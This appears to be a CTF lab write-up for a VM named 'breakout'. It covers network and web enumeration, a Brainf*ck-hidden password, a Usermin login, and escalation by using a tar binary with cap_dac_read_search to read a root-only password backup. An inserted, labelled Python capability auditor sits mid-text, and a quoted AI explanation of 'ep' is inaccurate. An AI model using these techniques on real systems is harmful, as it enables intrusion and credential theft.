breakout
nmap reconnaissance
Internal network scan
nmap -sn 192.168.1.0/24
Nmap scan report for 192.168.1.103
Host is up (0.000070s latency).
MAC Address: 00:0C:29:02:95:61 (VMware)
Deeper information gathering
nmap -T4 -sV -p- -A 192.168.1.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 09:54 CST
Nmap scan report for 192.168.1.103
Host is up (0.00023s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
|_http-server-header: MiniServ/1.830
MAC Address: 00:0C:29:02:95:61 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Host script results:
| smb2-time:
| date: 2024-03-09T01:54:31
|_ start_date: N/A
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE
HOP RTT ADDRESS
1 0.23 ms 192.168.1.103
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.74 seconds
Ports 80, 139, 445, 10000 and 20000 are found open.
Web directory brute-forcing
As a matter of routine, brute-force the web directories first.
gobuster dir -u 192.168.1.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.103
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,js,sh,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 11159]
/.html (Status: 403) [Size: 278]
/manual (Status: 301) [Size: 315] [--> http://192.168.1.103/manual/]
/.html (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================
dirsearch -u http://192.168.1.103/ -s 1 -t 10
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 10 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.1.103/-_24-03-09_09-57-57.txt
Error Log: /root/.dirsearch/logs/errors-24-03-09_09-57-57.log
Target: http://192.168.1.103/
[09:57:57] Starting:
[09:58:55] 403 - 278B - /.ht_wsr.txt
[09:58:56] 403 - 278B - /.htaccess.bak1
[09:58:56] 403 - 278B - /.htaccess.orig
[09:58:56] 403 - 278B - /.htaccess.sample
[09:58:56] 403 - 278B - /.htaccess.save
[09:58:56] 403 - 278B - /.htaccess_extra
[09:58:57] 403 - 278B - /.htaccess_orig
[09:58:57] 403 - 278B - /.htaccess_sc
[09:58:57] 403 - 278B - /.htaccessBAK
[09:58:57] 403 - 278B - /.htaccessOLD
[09:58:57] 403 - 278B - /.htaccessOLD2
[09:58:57] 403 - 278B - /.htm
[09:58:57] 403 - 278B - /.html
[09:58:58] 403 - 278B - /.htpasswd_test
[09:58:58] 403 - 278B - /.htpasswds
[09:58:58] 403 - 278B - /.httr-oauth
[10:09:30] 200 - 11KB - /index.html
[10:10:44] 301 - 315B - /manual -> http://192.168.1.103/manual/
[10:10:44] 200 - 676B - /manual/index.html
[10:13:32] 403 - 278B - /server-status
[10:13:32] 403 - 278B - /server-status/
Decoding
Visiting each of them turned up nothing.
Viewing the index.html source reveals something hidden.
A quick search shows it is Brainf*ck code.
Original:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
Decoded:
.2uqPEfj3D<P'a-3
Its meaning is unclear, but it looks very much like a strong password.
Logging into the admin panel
Ports 10000 and 20000 each serve a login page for a web service; combined with what was hidden in index.html, this looks like a page we can log into.
The earlier nmap scan found Samba and Webmin services, so use the enum4linux script to enumerate them.
enum4linux -a 192.168.1.103
This reveals a local user, cyber; try it together with the strong password found earlier.
Log in: the Usermin login succeeds.
Reverse shell
There is a command line available, so write a reverse shell.
From here on I followed someone else's writeup.
After a lot of poking around I only found a user.txt in the home directory, and opening it showed nothing; only by reading someone else's writeup did I learn how to proceed.
A tar binary is found in the current directory.
Check the capabilities of the tar executable:
getcap tar
tar cap_dac_read_search=ep
(Explanation from GPT)
In Linux, cap_dac_read_search is a capability that grants a process the ability to read and search the file system while it is running, even if the process does not have the user's permissions. ep probably stands for "Effective Permission", meaning the process can effectively read and search the file system.
Then a password backup file is found in the /var/backups directory, but it is readable and writable only by root.
So use the tar found earlier, which can read arbitrary files, to read its contents.
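A defender-side check for this kind of finding, added here and not part of the original writeup: a parser for getcap output (both the older `path = caps+flags` and the newer `path caps=flags` formats) that flags binaries whose file capabilities let any user bypass file permission checks. The getcap lines below are constructed sample data; the remediation command in the comment assumes the libcap setcap tool.

```python
# Audit file capabilities reported by `getcap -r / 2>/dev/null` and flag the ones
# that bypass discretionary access control (DAC) on files.
# Added example; not code from the original writeup. Sample lines are constructed.
import re

# Capabilities that let a binary read (or read and write) files regardless of mode bits.
DAC_BYPASS = {"cap_dac_read_search", "cap_dac_override"}

# getcap prints "<path> = <caps>+<flags>" (libcap before 2.41) or "<path> <caps>=<flags>"
# (libcap 2.41 and later), e.g. the page's "tar cap_dac_read_search=ep".
# In setcap notation the flags name the Effective (e), Inheritable (i) and Permitted (p) sets.
_LINE = re.compile(r"^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>[a-z_,]+)[+=](?P<flags>[eip]+)$")


def parse_getcap_line(line: str):
    """Return (path, set of capability names, flags) or None if not a getcap entry."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    return m["path"], set(m["caps"].split(",")), m["flags"]


def risky_capabilities(getcap_output: str):
    """Return [(path, [caps])] for binaries carrying a DAC-bypass capability."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        # A capability in the Permitted set can be raised by the program, so "p" alone
        # is enough to matter; "e" makes it active from the first instruction.
        if caps & DAC_BYPASS and ("p" in flags or "e" in flags):
            findings.append((path, sorted(caps & DAC_BYPASS)))
    return findings


# Constructed sample output mixing both getcap line formats.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/vim.basic = cap_dac_override+ep
/usr/sbin/arping = cap_net_raw+ep
"""

if __name__ == "__main__":
    for path, caps in risky_capabilities(SAMPLE_GETCAP):
        # Remediation for an unneeded grant: `setcap -r <path>` removes all file capabilities.
        print(f"{path}: {','.join(caps)} (consider: setcap -r {path})")
```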
cyber@breakout:~$ ./tar -cf pass.tar /var/backups/.old_pass.bak
./tar -cf pass.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ tar -xf pass.tar
tar -xf pass.tar
cyber@breakout:~$ cat var/backups/.old_pass.bak
cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h
Privilege escalation succeeded
Searching through all those directories was really maddening; I assumed it would take a script exploiting some vulnerability to escalate privileges, but it turned out the password could be found directly.
Afterwards I learned to use scripts to scan sensitive directories; lesson learned.